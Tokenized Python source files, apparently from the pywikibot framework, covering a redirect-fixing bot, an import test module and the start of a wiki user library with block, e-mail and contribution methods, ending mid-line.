continue <EOL> try : <EOL> for page in moved_page . getReferences ( follow_redirects = True , <EOL> redirectsOnly = True ) : <EOL> yield page <EOL> except pywikibot . NoPage : <EOL> continue <EOL> m = offsetpattern . search ( move_list ) <EOL> if not m : <EOL> break <EOL> offset_time = m . group ( <NUM_LIT:1> ) <EOL> class RedirectRobot : <EOL> def __init__ ( self , action , generator , always = False , number = None ) : <EOL> self . site = pywikibot . getSite ( ) <EOL> self . action = action <EOL> self . generator = generator <EOL> self . always = always <EOL> self . number = number <EOL> self . exiting = False <EOL> def prompt ( self , question ) : <EOL> if not self . always : <EOL> choice = pywikibot . inputChoice ( question , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT:y>' , '<STR_LIT:N>' , '<STR_LIT:a>' , '<STR_LIT:q>' ] , '<STR_LIT:N>' ) <EOL> if choice == '<STR_LIT:n>' : <EOL> return False <EOL> elif choice == '<STR_LIT:q>' : <EOL> self . exiting = True <EOL> return False <EOL> elif choice == '<STR_LIT:a>' : <EOL> self . always = True <EOL> return True <EOL> def delete_broken_redirects ( self ) : <EOL> reason = i18n . twtranslate ( self . site , '<STR_LIT>' ) <EOL> for redir_name in self . generator . retrieve_broken_redirects ( ) : <EOL> self . delete_1_broken_redirect ( redir_name , reason ) <EOL> if self . exiting : <EOL> break <EOL> def delete_1_broken_redirect ( self , redir_name , reason ) : <EOL> redir_page = pywikibot . Page ( self . site , redir_name ) <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % redir_page . title ( ) ) <EOL> try : <EOL> targetPage = redir_page . getRedirectTarget ( ) <EOL> except pywikibot . IsNotRedirectPage : <EOL> pywikibot . output ( u'<STR_LIT>' % redir_page . title ( ) ) <EOL> except pywikibot . NoPage : <EOL> pywikibot . output ( u'<STR_LIT>' % redir_page . title ( ) ) <EOL> else : <EOL> try : <EOL> targetPage . get ( ) <EOL> except pywikibot . NoPage : <EOL> if self . prompt ( u'<STR_LIT>' <EOL> u'<STR_LIT>' <EOL> % ( targetPage . title ( asLink = True ) , <EOL> redir_page . title ( asLink = True ) ) ) : <EOL> try : <EOL> redir_page . delete ( reason , prompt = False ) <EOL> except pywikibot . NoUsername : <EOL> if ( ( i18n . twhas_key ( <EOL> targetPage . site . lang , <EOL> '<STR_LIT>' ) and <EOL> i18n . twhas_key ( targetPage . site . lang , <EOL> '<STR_LIT>' ) ) or targetPage . site . lang == '<STR_LIT:->' ) : <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> u"<STR_LIT>" ) <EOL> content = redir_page . get ( get_redirect = True ) <EOL> content = i18n . twtranslate ( <EOL> targetPage . site . lang , <EOL> '<STR_LIT>' <EOL> ) + "<STR_LIT:\n>" + content <EOL> redir_page . put ( content , reason ) <EOL> except pywikibot . IsRedirectPage : <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> % targetPage . title ( asLink = True ) ) <EOL> else : <EOL> pywikibot . output ( <EOL> u'<STR_LIT>' <EOL> % targetPage . title ( asLink = True ) ) <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> def fix_double_redirects ( self ) : <EOL> for redir_name in self . generator . retrieve_double_redirects ( ) : <EOL> self . fix_1_double_redirect ( redir_name ) <EOL> if self . exiting : <EOL> break <EOL> def fix_1_double_redirect ( self , redir_name ) : <EOL> redir = pywikibot . Page ( self . site , redir_name ) <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % redir . title ( ) ) <EOL> newRedir = redir <EOL> redirList = [ ] <EOL> while True : <EOL> redirList . append ( u'<STR_LIT>' % ( newRedir . site . lang , <EOL> newRedir . sectionFreeTitle ( ) ) ) <EOL> try : <EOL> targetPage = newRedir . getRedirectTarget ( ) <EOL> except pywikibot . IsNotRedirectPage : <EOL> if len ( redirList ) == <NUM_LIT:1> : <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % redir . title ( asLink = True ) ) <EOL> break <EOL> elif len ( redirList ) == <NUM_LIT:2> : <EOL> pywikibot . output ( <EOL> u'<STR_LIT>' <EOL> % newRedir . title ( asLink = True ) ) <EOL> break <EOL> else : <EOL> pass <EOL> except pywikibot . SectionError : <EOL> pywikibot . warning ( <EOL> u"<STR_LIT>" <EOL> % newRedir . title ( asLink = True ) ) <EOL> except pywikibot . BadTitle as e : <EOL> pywikibot . warning ( <EOL> u'<STR_LIT>' <EOL> % str ( e ) [ <NUM_LIT:10> : ] ) <EOL> except pywikibot . InvalidTitle , err : <EOL> pywikibot . warning ( u'<STR_LIT:%s>' % err ) <EOL> break <EOL> except pywikibot . NoPage : <EOL> if len ( redirList ) == <NUM_LIT:1> : <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % redir . title ( asLink = True ) ) <EOL> break <EOL> else : <EOL> if self . always : <EOL> pywikibot . output ( <EOL> u"<STR_LIT>" <EOL> % newRedir . title ( asLink = True ) ) <EOL> break <EOL> else : <EOL> pywikibot . warning ( <EOL> u"<STR_LIT>" <EOL> % newRedir . title ( asLink = True ) ) <EOL> except pywikibot . ServerError : <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> u'<STR_LIT>' ) <EOL> break <EOL> else : <EOL> pywikibot . output ( <EOL> u'<STR_LIT>' <EOL> % targetPage . title ( asLink = True ) ) <EOL> if targetPage . site != self . site : <EOL> pywikibot . warning ( <EOL> u'<STR_LIT>' <EOL> % targetPage . title ( asLink = True ) ) <EOL> if self . always : <EOL> break <EOL> try : <EOL> mw_msg = targetPage . site . mediawiki_message ( <EOL> '<STR_LIT>' ) <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> if targetPage . title ( ) == mw_msg : <EOL> pywikibot . output ( <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" ) <EOL> break <EOL> if redirList . count ( u'<STR_LIT>' <EOL> % ( targetPage . site . lang , <EOL> targetPage . sectionFreeTitle ( ) ) ) : <EOL> pywikibot . warning ( <EOL> u'<STR_LIT>' <EOL> % targetPage . title ( asLink = True ) ) <EOL> break <EOL> else : <EOL> if targetPage . isStaticRedirect ( ) : <EOL> pywikibot . output ( <EOL> u"<STR_LIT>" ) <EOL> pass <EOL> else : <EOL> newRedir = targetPage <EOL> continue <EOL> try : <EOL> oldText = redir . get ( get_redirect = True ) <EOL> except pywikibot . BadTitle : <EOL> pywikibot . output ( u"<STR_LIT>" ) <EOL> break <EOL> text = self . site . redirectRegex ( ) . sub ( <EOL> '<STR_LIT>' % ( self . site . redirect ( ) , <EOL> targetPage . title ( asLink = True , textlink = True ) ) , <EOL> oldText ) <EOL> if redir . title ( ) == targetPage . title ( ) or text == oldText : <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % redir . title ( asLink = True ) ) <EOL> break <EOL> summary = i18n . twtranslate ( self . site , '<STR_LIT>' , <EOL> { '<STR_LIT:to>' : targetPage . title ( asLink = True ) } <EOL> ) <EOL> pywikibot . showDiff ( oldText , text ) <EOL> if self . prompt ( u'<STR_LIT>' ) : <EOL> try : <EOL> redir . put ( text , summary ) <EOL> except pywikibot . LockedPage : <EOL> pywikibot . output ( u'<STR_LIT>' % redir . title ( ) ) <EOL> except pywikibot . SpamfilterError as error : <EOL> pywikibot . output ( <EOL> u"<STR_LIT>" <EOL> % ( redir . title ( ) , error . url ) ) <EOL> except pywikibot . PageNotSaved as error : <EOL> pywikibot . output ( u"<STR_LIT>" <EOL> % ( redir . title ( ) , error ) ) <EOL> except pywikibot . NoUsername : <EOL> pywikibot . output ( <EOL> u"<STR_LIT>" <EOL> % redir . title ( ) ) <EOL> except pywikibot . Error as error : <EOL> pywikibot . output ( <EOL> u"<STR_LIT>" <EOL> % ( redir . title ( ) , error ) ) <EOL> break <EOL> def fix_double_or_delete_broken_redirects ( self ) : <EOL> delete_reason = i18n . twtranslate ( self . site , '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for ( redir_name , code , target , final ) in self . generator . get_redirects_via_api ( maxlen = <NUM_LIT:2> ) : <EOL> if code == <NUM_LIT:1> : <EOL> continue <EOL> elif code == <NUM_LIT:0> : <EOL> self . delete_1_broken_redirect ( redir_name , delete_reason ) <EOL> count += <NUM_LIT:1> <EOL> else : <EOL> self . fix_1_double_redirect ( redir_name ) <EOL> count += <NUM_LIT:1> <EOL> if self . exiting or ( self . number and count >= self . number ) : <EOL> break <EOL> def run ( self ) : <EOL> if self . action == '<STR_LIT>' : <EOL> self . fix_double_redirects ( ) <EOL> elif self . action == '<STR_LIT>' : <EOL> self . delete_broken_redirects ( ) <EOL> elif self . action == '<STR_LIT>' : <EOL> self . fix_double_or_delete_broken_redirects ( ) <EOL> def main ( * args ) : <EOL> action = None <EOL> xmlFilename = None <EOL> namespaces = [ ] <EOL> offset = - <NUM_LIT:1> <EOL> moved_pages = False <EOL> fullscan = False <EOL> start = '<STR_LIT>' <EOL> until = '<STR_LIT>' <EOL> number = None <EOL> always = False <EOL> for arg in pywikibot . handleArgs ( * args ) : <EOL> if arg == '<STR_LIT>' or arg == '<STR_LIT>' : <EOL> action = '<STR_LIT>' <EOL> elif arg == '<STR_LIT>' or arg == '<STR_LIT>' : <EOL> action = '<STR_LIT>' <EOL> elif arg == '<STR_LIT>' : <EOL> action = '<STR_LIT>' <EOL> elif arg == '<STR_LIT>' : <EOL> fullscan = True <EOL> elif arg == '<STR_LIT>' : <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> u'<STR_LIT>' ) <EOL> fullscan = True <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> if len ( arg ) == <NUM_LIT:4> : <EOL> xmlFilename = i18n . input ( '<STR_LIT>' ) <EOL> else : <EOL> xmlFilename = arg [ <NUM_LIT:5> : ] <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> moved_pages = True <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> ns = arg [ <NUM_LIT:11> : ] <EOL> if ns == '<STR_LIT>' : <EOL> ns = i18n . input ( '<STR_LIT>' ) <EOL> if ns == '<STR_LIT>' : <EOL> ns = '<STR_LIT:0>' <EOL> try : <EOL> ns = int ( ns ) <EOL> except ValueError : <EOL> pass <EOL> if ns not in namespaces : <EOL> namespaces . append ( ns ) <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> offset = int ( arg [ <NUM_LIT:8> : ] ) <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> start = arg [ <NUM_LIT:7> : ] <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> until = arg [ <NUM_LIT:7> : ] <EOL> elif arg . startswith ( '<STR_LIT>' ) : <EOL> number = int ( arg [ <NUM_LIT:7> : ] ) <EOL> elif arg == '<STR_LIT>' : <EOL> always = True <EOL> else : <EOL> pywikibot . output ( u'<STR_LIT>' % arg ) <EOL> if ( <EOL> not action or <EOL> xmlFilename and moved_pages or <EOL> fullscan and xmlFilename <EOL> ) : <EOL> pywikibot . showHelp ( ) <EOL> else : <EOL> gen = RedirectGenerator ( xmlFilename , namespaces , offset , moved_pages , <EOL> fullscan , start , until , number ) <EOL> bot = RedirectRobot ( action , gen , always , number ) <EOL> bot . run ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> try : <EOL> main ( ) <EOL> finally : <EOL> pywikibot . stopme ( ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> import unittest <EOL> import test_pywiki <EOL> import sys , os <EOL> scriptdir = os . path . dirname ( sys . argv [ <NUM_LIT:0> ] ) <EOL> if not os . path . isabs ( scriptdir ) : <EOL> scriptdir = os . path . abspath ( os . path . join ( os . curdir , scriptdir ) ) <EOL> os . chdir ( os . path . join ( scriptdir , '<STR_LIT:..>' ) ) <EOL> class PyWikiExternalImporterTestCase ( test_pywiki . PyWikiTestCase ) : <EOL> def test_spelling ( self ) : <EOL> self . assertTrue ( os . path . exists ( os . path . join ( scriptdir , '<STR_LIT>' ) ) ) <EOL> def test_i18n ( self ) : <EOL> import i18n <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> def test_crontab ( self ) : <EOL> import crontab <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> def test_odf ( self ) : <EOL> import odf <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> def test_openpyxl ( self ) : <EOL> import openpyxl <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> def test_dtbext_compiled ( self ) : <EOL> return <EOL> target = os . path . join ( scriptdir , '<STR_LIT>' ) <EOL> sys . path . append ( target ) <EOL> import jseg <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> self . assertTrue ( os . path . exists ( os . path . join ( scriptdir , '<STR_LIT>' ) ) ) <EOL> self . assertTrue ( os . path . exists ( os . path . join ( scriptdir , '<STR_LIT>' ) ) ) <EOL> import opencv <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import pycolorname <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> try : <EOL> import pydmtx <EOL> except : <EOL> import _pydmtx as pydmtx <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> from colormath . color_objects import RGBColor <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> from py_w3c . validators . html . validator import HTMLValidator , ValidationFault <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> try : <EOL> import zbar <EOL> except : <EOL> import _zbar as zbar <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> sys . path . remove ( target ) <EOL> def test_dtbext_packaged ( self ) : <EOL> return <EOL> import numpy <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import scipy <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import cv <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> sys . path . append ( '<STR_LIT>' ) <EOL> import cv2 <EOL> sys . path . remove ( '<STR_LIT>' ) <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import pyexiv2 <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import warnings <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( "<STR_LIT:ignore>" ) <EOL> import gtk <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import rsvg <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import cairo <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import magic <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> import pywt <EOL> self . assertTrue ( "<STR_LIT>" in sys . modules ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> import re <EOL> import wikipedia as pywikibot <EOL> import config <EOL> import query <EOL> class AutoblockUser ( pywikibot . Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UserActionRefuse ( pywikibot . Error ) : <EOL> pass <EOL> class BlockError ( UserActionRefuse ) : <EOL> pass <EOL> class AlreadyBlocked ( BlockError ) : <EOL> pass <EOL> class UnblockError ( UserActionRefuse ) : <EOL> pass <EOL> class BlockIDError ( UnblockError ) : <EOL> pass <EOL> class AlreadyUnblocked ( UnblockError ) : <EOL> pass <EOL> class InvalidUser ( pywikibot . InvalidTitle ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> ip_regexp = re . compile ( r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' , <EOL> re . IGNORECASE ) <EOL> class User ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , site , name ) : <EOL> """<STR_LIT>""" <EOL> if len ( name ) > <NUM_LIT:1> and name [ <NUM_LIT:0> ] == u'<STR_LIT:#>' : <EOL> self . _isAutoblock = True <EOL> else : <EOL> self . _isAutoblock = False <EOL> if self . _isAutoblock : <EOL> pywikibot . output ( <EOL> "<STR_LIT>" ) <EOL> if type ( site ) in [ str , unicode ] : <EOL> self . _site = pywikibot . getSite ( site ) <EOL> else : <EOL> self . _site = site <EOL> if self . _site . lang in self . _site . family . nocapitalize : <EOL> self . _name = name <EOL> else : <EOL> self . _name = name [ <NUM_LIT:0> ] . upper ( ) + name [ <NUM_LIT:1> : ] <EOL> self . _name = self . _name . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) <EOL> self . _blocked = None <EOL> self . _groups = None <EOL> self . _registrationTime = - <NUM_LIT:1> <EOL> def site ( self ) : <EOL> return self . _site <EOL> def name ( self ) : <EOL> return self . username <EOL> @ property <EOL> def username ( self ) : <EOL> return self . _name <EOL> def isRegistered ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> if self . isAnonymous ( ) : <EOL> return False <EOL> else : <EOL> return self . registrationTime ( force ) != - <NUM_LIT:1> <EOL> def isAnonymous ( self ) : <EOL> return ip_regexp . match ( self . username . split ( "<STR_LIT:/>" ) [ <NUM_LIT:0> ] ) is not None <EOL> def exists ( self ) : <EOL> return self . isAnonymous ( ) or self . isRegistered ( ) <EOL> def __str__ ( self ) : <EOL> return ( u'<STR_LIT>' <EOL> % ( self . site ( ) , self . name ( ) ) ) . encode ( config . console_encoding , <EOL> '<STR_LIT:replace>' ) <EOL> def __repr__ ( self ) : <EOL> return self . __str__ ( ) <EOL> def _load ( self ) : <EOL> getall ( self . site ( ) , [ self ] , force = True ) <EOL> def registrationTime ( self , force = False ) : <EOL> if self . _registrationTime < <NUM_LIT:0> or force : <EOL> self . _load ( ) <EOL> return self . _registrationTime <EOL> def editCount ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) or force : <EOL> self . _load ( ) <EOL> return self . _editcount <EOL> def isBlocked ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> if not self . _blocked or force : <EOL> self . _load ( ) <EOL> return self . _blocked <EOL> def isEmailable ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _load ( ) <EOL> return self . _mailable <EOL> def groups ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> if not self . _groups or force : <EOL> self . _load ( ) <EOL> return self . _groups <EOL> def getUserPage ( self , subpage = u'<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if self . _isAutoblock : <EOL> raise AutoblockUser ( <EOL> u"<STR_LIT>" ) <EOL> if subpage : <EOL> subpage = u'<STR_LIT:/>' + subpage <EOL> return pywikibot . Page ( self . site ( ) , self . name ( ) + subpage , <EOL> defaultNamespace = <NUM_LIT:2> ) <EOL> def getUserTalkPage ( self , subpage = u'<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if self . _isAutoblock : <EOL> raise AutoblockUser ( <EOL> u"<STR_LIT>" ) <EOL> if subpage : <EOL> subpage = u'<STR_LIT:/>' + subpage <EOL> return pywikibot . Page ( self . site ( ) , self . name ( ) + subpage , <EOL> defaultNamespace = <NUM_LIT:3> ) <EOL> def sendMail ( self , subject = u'<STR_LIT>' , text = u'<STR_LIT>' , ccMe = False ) : <EOL> """<STR_LIT>""" <EOL> if not self . isEmailable ( ) : <EOL> raise UserActionRefuse ( '<STR_LIT>' ) <EOL> if self . site ( ) . versionnumber ( ) >= <NUM_LIT:16> and not self . site ( ) . isAllowed ( '<STR_LIT>' ) : <EOL> raise UserActionRefuse ( '<STR_LIT>' ) <EOL> if not self . site ( ) . has_api ( ) or self . site ( ) . versionnumber ( ) < <NUM_LIT> : <EOL> return self . sendMailOld ( subject , text , ccMe ) <EOL> params = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT:target>' : self . name ( ) , <EOL> '<STR_LIT>' : self . site ( ) . getToken ( ) , <EOL> '<STR_LIT>' : subject , <EOL> '<STR_LIT:text>' : text , <EOL> } <EOL> if ccMe : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> maildata = query . GetData ( params , self . site ( ) ) <EOL> if '<STR_LIT:error>' in maildata : <EOL> code = maildata [ '<STR_LIT:error>' ] [ '<STR_LIT:code>' ] <EOL> if code == u'<STR_LIT>' : <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> elif '<STR_LIT>' in maildata : <EOL> if maildata [ '<STR_LIT>' ] [ '<STR_LIT:result>' ] == u'<STR_LIT>' : <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> return True <EOL> return False <EOL> def sendMailOld ( self , subject = u'<STR_LIT>' , text = u'<STR_LIT>' , ccMe = False ) : <EOL> address = self . site ( ) . put_address ( '<STR_LIT>' ) <EOL> predata = { <EOL> "<STR_LIT>" : subject , <EOL> "<STR_LIT>" : text , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> } <EOL> if ccMe : <EOL> predata [ '<STR_LIT>' ] = '<STR_LIT:1>' <EOL> predata [ '<STR_LIT>' ] = self . site ( ) . getToken ( ) <EOL> response , data = self . site ( ) . postForm ( address , predata , sysop = False ) <EOL> if data : <EOL> if '<STR_LIT>' in data : <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> return True <EOL> else : <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> return False <EOL> else : <EOL> pywikibot . output ( u'<STR_LIT>' ) <EOL> return False <EOL> @ pywikibot . deprecated ( '<STR_LIT>' ) <EOL> def editedPages ( self , limit = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> for item in self . contributions ( limit ) : <EOL> yield item [ <NUM_LIT:0> ] <EOL> def contributions ( self , limit = <NUM_LIT> , namespace = [ ] ) : <EOL> """<STR_LIT>""" <EOL> if not self . site ( ) . has_api ( ) : <EOL> raise NotImplementedError <EOL> params = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT:list>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . name ( ) , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : limit , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> if limit > pywikibot . config . special_page_limit : <EOL> params [ '<STR_LIT>' ] = pywikibot . config . special_page_limit <EOL> if limit > <NUM_LIT> and self . site ( ) . isAllowed ( '<STR_LIT>' ) : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT> <EOL> if namespace : <EOL> params [ '<STR_LIT>' ] = namespace <EOL> nbresults = <NUM_LIT:0> <EOL> while True : <EOL> pywikibot . output ( u'<STR_LIT>' <EOL> % ( params [ '<STR_LIT>' ] , self . site ( ) ) ) <EOL> result = query . GetData ( params , self . site ( ) ) <EOL> if '<STR_LIT:error>' in result : <EOL> pywikibot . output ( '<STR_LIT:%s>' % result ) <EOL> raise pywikibot . Error <EOL> for contrib in result [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> ts = pywikibot . parsetime2stamp ( contrib [ '<STR_LIT>' ] ) <EOL> yield ( pywikibot . Page ( self . site ( ) , contrib [ '<STR_LIT:title>' ] , <EOL> defaultNamespace = contrib [ '<STR_LIT>' ] ) , <EOL> contrib [ '<STR_LIT>' ] , ts , contrib . get ( '<STR_LIT>' , None ) ) <EOL> nbresults += <NUM_LIT:1> <EOL> if nbresults >= limit : <EOL> break <EOL> if '<STR_LIT>' in result and nbresults < limit : <EOL> params . update ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> else : <EOL> break <EOL> def uploadedImages ( self , number = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> if self . isAnonymous ( ) : <EOL> raise StopIteration <EOL> if not self . site ( ) . has_api ( ) or self . site ( ) . versionnumber ( ) < <NUM_LIT:11> : <EOL> for c in self . _uploadedImagesOld ( number ) : <EOL> yield c <EOL> return <EOL> for item in self . site ( ) . logpages ( number , mode = '<STR_LIT>' , <EOL> user = self . username , dump = True ) : <EOL> yield ( pywikibot . ImagePage ( self . site ( ) , item [ '<STR_LIT:title>' ] ) , <EOL> item [ '<STR_LIT>' ] , item [ '<STR_LIT>' ] , item [ '<STR_LIT>' ] > <NUM_LIT:0> ) <EOL> def _uploadedImagesOld ( self , number = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> regexp = re . compile ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , re . UNICODE ) <EOL> path = self . site ( ) . log_address ( number , mode = '<STR_LIT>' , user = self . name ( ) ) <EOL> html = self . site ( ) . getUrl ( path ) <EOL> redlink_key = self . site ( ) . mediawiki_message ( '<STR_LIT>' ) <EOL> redlink_tail_len = None <EOL> if redlink_key . startswith ( '<STR_LIT>' ) : <EOL> redlink_tail_len = len ( redlink_key [ <NUM_LIT:3> : ] ) <EOL> for m in regexp . finditer ( html ) : <EOL> image = m . group ( '<STR_LIT:image>' ) <EOL> deleted = False <EOL> if m . group ( '<STR_LIT>' ) : <EOL> deleted = True <EOL> if redlink_tail_len : <EOL> image = image [ <NUM_LIT:0> : <NUM_LIT:0> - redlink_tail_len ] <EOL> date = m . group ( '<STR_LIT:date>' ) <EOL> comment = m . group ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> yield pywikibot . ImagePage ( self . site ( ) , <EOL> image ) , date , comment , deleted <EOL> def block ( self , expiry = None , reason = None , anon = True , noCreate = False , <EOL> onAutoblock = False , banMail = False , watchUser = False , <EOL> allowUsertalk = True , reBlock = False , hidename = False ) : <EOL> """<STR_LIT>""" <EOL> if self . _isAutoblock : <EOL> raise AutoblockUser <EOL> if self . isBlocked ( ) and not reBlock : <EOL> raise AlreadyBlocked ( ) <EOL> if not self . site ( ) . isAllowed ( '<STR_LIT>' , sysop = True ) : <EOL> raise UserActionRefuse ( '<STR_LIT>' ) <EOL> if not expiry : <EOL> expiry = pywikibot . input ( <EOL> u'<STR_LIT>' ) <EOL> if not reason : <EOL> reason = pywikibot . input ( u'<STR_LIT>' ) <EOL> if not self . site ( ) . has_api ( ) or self . site ( ) . versionnumber ( ) < <NUM_LIT:12> : <EOL> return self . _blockOld ( expiry , reason , anon , noCreate , <EOL> onAutoblock , banMail , watchUser , <EOL> allowUsertalk , reBlock ) <EOL> params = { <EOL> '<STR_LIT:action>' : '<STR_LIT>' , <EOL> '<STR_LIT:user>' : self . name ( ) , <EOL> '<STR_LIT>' : self . site ( ) . getToken ( self , sysop = True ) , <EOL> '<STR_LIT>' : reason , <EOL> } <EOL> if expiry : <EOL> params [ '<STR_LIT>' ] = expiry <EOL> if anon : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if noCreate : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if onAutoblock : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if banMail : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if hidename : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if allowUsertalk : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if reBlock : <EOL> params [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> data = query . GetData ( params , self . site ( ) , sysop = True ) <EOL> if '<STR_LIT:error>' in data : <EOL> errCode = data [ '<STR_LIT:error>' ] [ '<STR_LIT:code>' ] <EOL> if errCode == '<STR_LIT>' : <EOL> raise AlreadyBlocked ( ) <EOL> elif errCode == '<STR_LIT>' : <EOL> raise AlreadyBlocked ( "<STR_LIT>" ) <EOL> elif errCode == '<STR_LIT>' : <EOL> raise BlockError ( "<STR_LIT>" ) <EOL> elif errCode == '<STR_LIT>' : <EOL> raise BlockError ( "<STR_LIT>" ) <EOL> elif errCode == '<STR_LIT>' : <EOL> raise BlockError ( "<STR_LIT>" ) <EOL> elif '<STR_LIT>' in data : <EOL> return True <EOL> else : <EOL> pywikibot . output ( "<STR_LIT>" % data ) <EOL> raise BlockError <EOL> raise False <EOL> def _blockOld ( self , expiry , reason , anonOnly , noSignup , enableAutoblock , <EOL> emailBan , watchUser , allowUsertalk ) : <EOL> """<STR_LIT>""" <EOL> token = self . site ( ) . getToken ( self , sysop = True ) <EOL> pywikibot . output ( u"<STR_LIT>" % self . name ( ) ) <EOL> boolStr = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] <EOL> predata = { <EOL> '<STR_LIT>' : self . name ( ) , <EOL> '<STR_LIT>' : expiry , <EOL> '<STR_LIT>' : reason , <EOL> '<STR_LIT>' : boolStr [ anonOnly ] , <EOL> '<STR_LIT>' : boolStr [ noSignup ] , <EOL> '<STR_LIT>' : boolStr [ enableAutoblock ] , <EOL> '<STR_LIT>' : boolStr [ emailBan ] , <EOL> '<STR_LIT>' : boolStr [ watchUser ] , <EOL> '<STR_LIT>' : boolStr [ allowUsertalk ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : token <EOL> } <EOL> address = self . site ( ) . block_address ( ) <EOL> response , data = self . site ( ) . postForm ( address , predata , sysop = True ) <EOL> if data : <EOL> if self . site ( ) . mediawiki_message ( <EOL> '<STR_LIT>' ) . replace ( '<STR_LIT>' , self . name ( ) ) in data : <EOL> raise AlreadyBlockedError <EOL> raise BlockError <EOL> return True <EOL> def unblock ( self , reason = None ) : <EOL> """<STR_LIT>""" <EOL> if self . name ( ) [ <NUM_LIT:0> ] == '<STR_LIT:#>' : <EOL> blockID = self . name ( ) [ <NUM_LIT:1> : ] <EOL> else : <EOL> blockID = self . 